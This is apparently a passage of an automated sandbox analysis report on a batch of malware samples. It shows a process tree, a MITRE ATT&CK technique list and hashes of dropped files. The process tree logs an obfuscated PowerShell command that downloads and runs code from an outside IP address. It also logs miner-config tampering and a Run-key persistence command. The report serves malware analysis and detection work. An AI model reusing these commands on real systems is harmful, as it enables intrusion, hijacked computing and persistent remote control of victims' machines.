  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gumlnlfe\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\c3pool\\xmrig.log\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4776
- - C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe"
    3⤵
    PID:8300
- - C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
    3⤵
    PID:8700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8700 -s 536
      4⤵
      Program crash
      PID:8892
- - C:\Users\Admin\Downloads\UrlHausFiles\c1.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"
    3⤵
    PID:8976
- - C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"
    3⤵
    PID:8584
- - C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe"
    3⤵
    PID:8188
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im FLiNGTrainerUpdater.exe
      4⤵
      Kills process with taskkill
      PID:9132
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im FLiNGTrainer.exe
      4⤵
      Kills process with taskkill
      PID:8460
- - C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe"
    3⤵
    PID:8748
- - C:\Users\Admin\Downloads\UrlHausFiles\test26.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\test26.exe"
    3⤵
    PID:8952
- - C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
    3⤵
    PID:7640
- - C:\Users\Admin\Downloads\UrlHausFiles\stail.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
    3⤵
    PID:5540
  - - C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp" /SL5="$A0202,3886989,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
      4⤵
      PID:8560
    - - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause coder_media_11281
        5⤵
        
        PID:2556
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause coder_media_11281
        6⤵
        
        PID:5644
    - - C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe
        
        "C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i
        5⤵
        
        PID:8596
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "eBGamer45" -Value "C:\ProgramData\BridgeGamer\BridgeGamer.exe"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7708
- - C:\Windows\System32\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"
    3⤵
    PID:8844
- - C:\Users\Admin\Downloads\UrlHausFiles\bin.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\bin.exe"
    3⤵
    PID:4168
- - C:\Users\Admin\Downloads\UrlHausFiles\file.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\file.exe"
    3⤵
    PID:1140
  - - C:\Windows\SYSTEM32\wscript.exe
      "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
      4⤵
      PID:1508
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3944
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
        6⤵
        
        PID:5444
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5892
- - C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
    3⤵
    PID:5460
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd
      4⤵
      PID:1044
- - C:\Users\Admin\Downloads\UrlHausFiles\client.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\client.exe"
    3⤵
    PID:7976
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
      4⤵
      PID:916
    - - C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
        
        "C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
        5⤵
        
        PID:5764
      - C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\System32\ipconfig.exe" /flushdns
        6⤵
        Gathers network information
        
        PID:632
- - C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe"
    3⤵
    PID:6208
- - C:\Users\Admin\Downloads\UrlHausFiles\shell.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"
    3⤵
    PID:1548
- C:\Windows\SysWOW64\netbtugc.exe
  "C:\Windows\SysWOW64\netbtugc.exe"
  2⤵
  PID:7472

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4144

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6008

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5740 -ip 5740
1⤵
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5740 -ip 5740
1⤵
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5740 -ip 5740
1⤵
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5740 -ip 5740
1⤵
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5740 -ip 5740
1⤵
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5740 -ip 5740
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5740 -ip 5740
1⤵
PID:1652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5740 -ip 5740
1⤵
PID:5600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5740 -ip 5740
1⤵
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5740 -ip 5740
1⤵
PID:5744

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968
1⤵
PID:5748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1968 -ip 1968
1⤵
PID:2812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968
1⤵
PID:5624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 1968
1⤵
PID:5464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1968 -ip 1968
1⤵
PID:5556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968
1⤵
PID:1196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1968 -ip 1968
1⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1968 -ip 1968
1⤵
PID:6792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1968 -ip 1968
1⤵
PID:7048

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6164
- C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe
  "C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"
  2⤵
  PID:2068
- - C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
    "C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"
    3⤵
    PID:4828
  - - C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
      "C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80
      4⤵
      PID:5416
  - - C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
      "C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
      4⤵
      PID:6908
    - - C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
        
        "C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80
        5⤵
        
        PID:2060
- C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe
  "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"
  2⤵
  PID:8992
- C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe
  "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"
  2⤵
  PID:9012
- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
  "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkYwOUQ0OUEtRDIyNC00NEU1LTk1NjAtQkI5NDQ2MDEyM0QwfSIgdXNlcmlkPSJ7OTQ1MjhCNDgtNDg1RC00NjM3LUEyNDItNjcwQzUzRkUzRjY0fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezdDMjRFNERDLTc0MTUtNEM4Mi1CQUNGLTM4NTdEQ0FBODU3NX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMxLjAuNjc3OC44NiIgYXA9Ing2NC1zdGFibGUtc3RhdHNkZWZfMSIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI1MiIgaWlkPSJ7REIyNEVERDMtOTkyMC01RDVGLUZCQkUtOEU3NDNGNzQ4NkMxfSIgY29ob3J0PSIxOmd1L2kxOToiIGNvaG9ydG5hbWU9IlN0YWJsZSBJbnN0YWxscyAmYW1wOyBWZXJzaW9uIFBpbnMiPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vZWRnZWRsLm1lLmd2dDEuY29tL2VkZ2VkbC9yZWxlYXNlMi9jaHJvbWUvYWRtZ3hsdDRkNWM1cmN0bm96dzN3enBodzJ3cV8xMzEuMC42Nzc4Ljg2LzEzMS4wLjY3NzguODZfY2hyb21lX2luc3RhbGxlci5leGUiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgZG93bmxvYWRfdGltZV9tcz0iMjMxODYiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9Ijk4OSIgZG93bmxvYWRfdGltZV9tcz0iMjQ3NjAiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgaW5zdGFsbF90aW1lX21zPSIzNzQxMSIvPjwvYXBwPjwvcmVxdWVzdD4
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1968 -ip 1968
1⤵
PID:6884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968
1⤵
PID:5276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1968 -ip 1968
1⤵
PID:6056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1968 -ip 1968
1⤵
PID:7004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968
1⤵
PID:6612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5716 -ip 5716
1⤵
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4748 -ip 4748
1⤵
PID:5532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1792 -ip 1792
1⤵
PID:5684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968
1⤵
PID:5364

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
1⤵
PID:6780

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch
1⤵
PID:2100
- C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
  "C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
  2⤵
  PID:5060
- - C:\Windows\SYSTEM32\rundll32.exe
    rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run
    3⤵
    PID:6912

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4516
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:6556
- C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
  "C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"
  2⤵
  PID:8868
- - C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe
    C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe
    3⤵
    PID:8928

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1656

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
PID:7468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1968 -ip 1968
1⤵
PID:8152

C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe"
1⤵
PID:6240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8700 -ip 8700
1⤵
PID:8740

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe" -Embedding
1⤵
PID:9180
- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
  "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand
  2⤵
  PID:9196
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer
    3⤵
    PID:6224
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20
      4⤵
      PID:8260

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x470
1⤵
PID:7752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e595be3.rbs

Filesize
9KB

MD5
d6737f9fb7f2928f8afba58b07d6af1d

SHA1
f32cf110d0dd0d0128198164d510b84bcfdd21ab

SHA256
2164e7493c2b6cc6ad30c78eafc38e6a2fe88a5047e63ecb5b2eb8d1f4906804

SHA512
a07d7a7278a678702aea7d3a9dd078ccdcf7cf0a8bc537838dc52f9cbb1b7c4a861df6a2c8a4d07251f8a5d649a8c454784fcb76f8c2a0d344cea906121ae4bc

Download Submit
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Filesize
158KB

MD5
bfb045ceef93ef6ab1cef922a95a630e

SHA1
4a89fc0aa79757f4986b83f15b8780285db86fb6

SHA256
1f6b69d11a3066e21c40002a25986c44e24a66f023a40e5f49eecaea33f5576d

SHA512
9c1bfa88b5b5533ede94158fa3169b9e0458f1ceae04dae0e74f4c23a899ce27d9109bd298a2053fb698e2ed403f51a9b828ee9fa9d66b54a18cd0d969edc194

Download Submit
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

Filesize
710KB

MD5
4ed27cd391e16b0e256c76afc1f986c3

SHA1
e0d705f87f5b5334a81d18126b18a9a39f8b6d5e

SHA256
2096a5e42c046c360c7cd646309a0e7dbbaaed00e84e242166108464b7b0ca22

SHA512
7e9208d6782fa8ed08c4b896f314a535a5e38d18c4b66a2813698007d0efeea8014ef4c0bf4c139457c826d05eae4fd241c2db419a761b709f4f118bf0f9d1b6

Download Submit
C:\Program Files\Google\Chrome\Application\131.0.6778.86\Installer\setup.exe

Filesize
5.8MB

MD5
288b7ac41c7aee8f1eb192faae30b665

SHA1
5c48a395de873d25313a7b1a6191a7a9fb0387fe

SHA256
e92a14f9bbe4da7405002b4803740d69e96d0a29a2944513d503b89f2faa46c9

SHA512
880e087fa5b3cc8b758de49580a6c8821b3dc7b52d9c1fbb077268a1042df85ae4043a73b14586c60f82e0af483646ea3f10b1b7f071535a5bdd6f73bb77353b

Download Submit
C:\ProgramData\BridgeGamer\BridgeGamer.exe

Filesize
3.1MB

MD5
9cea57c3291b6830de246b453e7fb2f6

SHA1
e08de2aed424aa7339f0456a631095f3b116f8f4

SHA256
8bbda6436638e43c8f44582f2fe402b46ea795c3906bde5c31cfea252ce9a164

SHA512
004efacdec9fa5fa5a9425a630450fbd69fc029db9b135c2242d17e1e7ca9a6580ded1d01576725aeff04876f4682fa929228fde141af3025a87c49df674ae1c

Download Submit
C:\ProgramData\HIIIDAKKJJJK\EBFBKF

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
C:\ProgramData\HIIIDAKKJJJK\IEHDBG

Filesize
288KB

MD5
5ac11be6579e0e125ebdc085f79d894a

SHA1
e3eed80b034c4569511cd78736e3f746b2f0e637

SHA256
0da86edbeba1a1983d9e1261a74e85fd885c6b72d20f364176410580cd8235bf

SHA512
059c4f723f92710f96ad355f1e1e2b0a8fc163b9df486255e03b65916c5c0fe1df4ff85da66f03036e4ea4149e5d2beea4d63ee7472c0d53785d2cd0f402b931

Download Submit
C:\ProgramData\Synaptics\Synaptics.exe

Filesize
753KB

MD5
075045f176129f6b11d627db7c7a3c76

SHA1
d815d313d2882041b8adb063eda6a8bd62149443

SHA256
86586abd265e12fc63222aff947d6acb4f3d28b148f9c5abc5d548d74795f9c8

SHA512
